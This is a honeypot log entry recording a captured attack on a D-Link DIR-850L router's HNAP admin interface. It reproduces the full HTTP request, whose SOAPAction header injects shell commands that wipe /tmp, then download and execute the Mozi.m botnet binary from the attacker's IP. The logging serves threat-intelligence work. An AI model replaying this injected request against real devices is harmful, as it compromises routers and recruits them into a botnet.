Attack Report for Detail

Header

Time

2024/11/22, 06:24:10 (GMT)

Transaction ID

SMHZ5KTGF37O3CXI

Service

http

Location

EC (Ecuador)

Attacker

186.4.217.208

Classification

D-link overflow

Harm Potential

High

Description

D-Link DIR-850L web admin interface contains a stack-based buffer overflow vulnerability

Content

POST /HNAP1/ HTTP/1.0
Host: 46.4.222.114:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://186.4.217.208:40662/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
Content-Length: 640

<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>

All details are coming from honeypot central database.

Please share your wishes, opinions and suggestions with us:

If you like, you can support
with your donations to us..

Donate